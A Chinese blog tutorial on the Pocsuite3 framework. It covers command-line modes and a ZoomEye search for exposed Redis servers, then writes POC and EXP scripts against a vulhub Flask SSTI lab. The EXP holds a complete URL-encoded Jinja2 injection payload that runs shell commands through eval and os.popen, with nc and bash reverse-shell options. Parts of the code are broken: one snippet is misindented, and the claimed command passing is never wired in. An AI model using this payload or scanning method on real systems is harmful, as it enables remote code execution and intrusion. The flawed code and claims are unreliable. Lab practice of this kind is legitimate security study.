【实用工具】Pocsuite使用

发布于:2023-01-04 ⋅ 阅读:(387) ⋅ 点赞:(0)

作者:guko

pocsuite是一款基于漏洞与POC的远程漏洞验证框架,记录基本使用和POC跟EXP编写的学习记录

0x01 安装

直接下载解压安装

wget https://github.com/knownsec/pocsuite3/archive/master.zip
unzip master.zip

0x02 使用方法

Pocsuite具有两种交互模式,一种是命令行模式,另一种是控制台交互模式。–verify参数来调用verify方法,用于验证目标是否存在漏洞,–attack参数调用attack方法,用来向目标发起攻击。

1、verify验证模式,验证目标是否存在漏洞。-r为脚本路径,-u为目标地址

python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --verify

2、批量验证,将需要验证的所有目标IP写到一个txt文件中批量利用

python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url.txt --verify

3、加载文件夹下所有poc对目标进行测试,-r为文件夹路径

python3 pocsuite.py -r pocs/* -u url --verify

4、使用多线程。–threads表示线程数

python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --verify

5、使用Zoomey搜索引擎,搜索开放端口6379的Redis服务

python3 cli.py --dork 'port:6379' --vul-keyword 'redis' --max-page 2

6、Attack模式,向目标发起有效供给

python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --attack

7、使用shell交互式模式,对目标进行远程控制

python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --shell

8、使用自定义命令‘command’,调用外部传递参数,进行半交互式命令执行

python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --attack --command "whoami"

0x03 POC脚本编写

搭建Flask服务器模板环境

这里直接用VULHUB中的环境快速搭建

https://github.com/vulhub/vulhub/tree/master/flask/ssti
docker-compose build
docker-compose up -d

实际编写,将模版的_verify方法替换成Flask漏洞检测脚本既完成POC的编写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74

#!/usr/bin/python3
#新建一个符合POC命令规范的py文件
#编写POC实现类DemoPOC,继承自POCBase类
from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY

class DemoPOC(POCBase):
    vulID = '1.1'
    version = '1.1'
    author = ['1.1'] # POC作者名字
    vu1Date = '1.1' #漏洞公开时间
    updateDate = '1.1' #编写POC时间
    references = ['flask'] #漏洞地址来源
    name = 'flask' #POC名称
    appPowerLink = 'flask'#漏洞厂商主页地址
    appName = 'flask'#漏洞应用名称
    appVersion = '1.1' #漏洞影响版本
    vu1Type = '' #漏洞类型
    desc = '''
    test
    ''' #漏洞简要描述
    samples = ['00.00.00.00:8000'] #测试样例,使用POC测试成功的网站
    install_requires = []
    # 编写验证模式,在_verify方法中写入POC验证脚本
    def _verify(self):
        resu1t = {}
        path = "/?name="
        url = self.url + path
        payload = "{{22*22}}"
        try:
            resq = requests.get(url + payload)
            if resq and resq.status_code == 200 and "484" in resq.text:
                resu1t['VerifyInfo'] = {}
                resu1t['VerifyInfo']['URL'] = url
                resu1t['VerifyInfo']['name'] = payload
        except Exception as e:
            pass
        return self.parse_output(resu1t)

    def trim(str):
        newstr = ''
        for ch in str:  # 遍历每一个字符串
            if ch != ' ':
                newstr = newstr + ch
        return newstr
    #编写攻击模式,用_attack()函数中的写入EXP利用脚本,在攻击模式下可以不对目标进行getshell,查询管理员账户密码等操作
    def _attack(self):
        output = Output(self)
        result = {}
        # 攻击代码

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _shell(self):
        return

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

register_poc(DemoPOC)

0x04 EXP脚本编写

EXP脚本的编写与POC脚本编写一样,只需要修改_attack部分,替换成漏洞利用的脚本即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14

def _attack(self):
  resu1t = {}
  path = "/?name="
  url = self.url + path
  payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
  try:
    resq = requests.get(url + payload)
    if resq and resq.status_code == 200 and "www" in resq.text:
      resu1t['VerifyInfo'] = {}
      resu1t['VerifyInfo']['URL'] = url
      resu1t['VerifyInfo']['name'] = payload
      except Exception as e:
        pass
      return self.parse_output(resu1t)

既完成EXP编写,运行如下

python3 cli.py -r pocs/exp_flask.py -u http://127.0.0.1:8000 --attack

在Pocsuite3中,可以接受用户输入的命令行参数,对目标系统进行半交互控制。先要编写一个接受自定义命令的函数,将接收到的命令赋值给command参数

1
2
3
4
5
6
7
8

def _options(self):
    o = OrderedDict()
    payload = {
        "nc": REVERSE_PAYLOAD.NC,
        "bash": REVERSE_PAYLOAD.BASH,
    }
    o["command"] = OptDict(selected="bash", default=payload)
    return o

下面,创造一个cmd变量,用于接收用户输入的command命令参数,并嵌入payload字符串中。将写好的payload与url地址拼接,并通过requests函数发送到目标系统,即可在目标系统执行命令,将命令执行结果输出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

def _attack(self):
    resu1t = {}
    path = "/?name="
    url = self.url + path
    payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
    try:
        resq = requests.get(url + payload)
        t = resq.text
        t = t.replace('\n', '').replace('\r', '')
        print(t)
        t = t.replace(" ","")
        if resq and resq.status_code == 200 and "www" in resq.text:
            resu1t['VerifyInfo'] = {}
            resu1t['VerifyInfo']['URL'] = url
            resu1t['VerifyInfo']['name'] = t
    except Exception as e:
        pass
    return self.parse_output(resu1t)

最终完成的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90

#!/usr/bin/python3
from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY

class DemoPOC(POCBase):
    vulID = '1.1'
    version = '1.1'
    author = ['1.1']  # POC作者名字
    vu1Date = '1.1'  # 漏洞公开时间
    updateDate = '1.1'  # 编写POC时间
    references = ['flask']  # 漏洞地址来源
    name = 'flask'  # POC名称
    appPowerLink = 'flask'  # 漏洞厂商主页地址
    appName = 'flask'  # 漏洞应用名称
    appVersion = '1.1'  # 漏洞影响版本
    vu1Type = ''  # 漏洞类型
    desc = '''
        test
        '''  # 漏洞简要描述
    samples = ['00.00.00.00:8000']  # 测试样例,使用POC测试成功的网站
    install_requires = []

    def _options(self):
        o = OrderedDict()
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["command"] = OptDict(selected="bash", default=payload)
        return o
    def _verify(self):
        # output = Output(self)
        # result = {}
        resu1t = {}
        path = "/?name="
        url = self.url + path
        payload = "{{22*22}}"
        try:
            resq = requests.get(url + payload)
            if resq and resq.status_code == 200 and "484" in resq.text:
                resu1t['VerifyInfo'] = {}
                resu1t['VerifyInfo']['URL'] = url
                resu1t['VerifyInfo']['name'] = payload
        except Exception as e:
            pass
        return self.parse_output(resu1t)

    def _attack(self):
        resu1t = {}
        path = "/?name="
        url = self.url + path
        payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
        try:
            resq = requests.get(url + payload)
            t = resq.text
            t = t.replace('\n', '').replace('\r', '')
            print(t)
            t = t.replace(" ","")
            if resq and resq.status_code == 200 and "www" in resq.text:
                resu1t['VerifyInfo'] = {}
                resu1t['VerifyInfo']['URL'] = url
                resu1t['VerifyInfo']['name'] = t
        except Exception as e:
            pass
        return self.parse_output(resu1t)


    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _shell(self):
        return

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

register_poc(DemoPOC)

运行

python3 cli.py -r pocs/exp_flask.py -u http://127.0.0.1:8000 --attack --command 'id'

 

参考资料

python安全攻防渗透测试实战指南

扫码入群,和更多优秀的人同行!

 

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布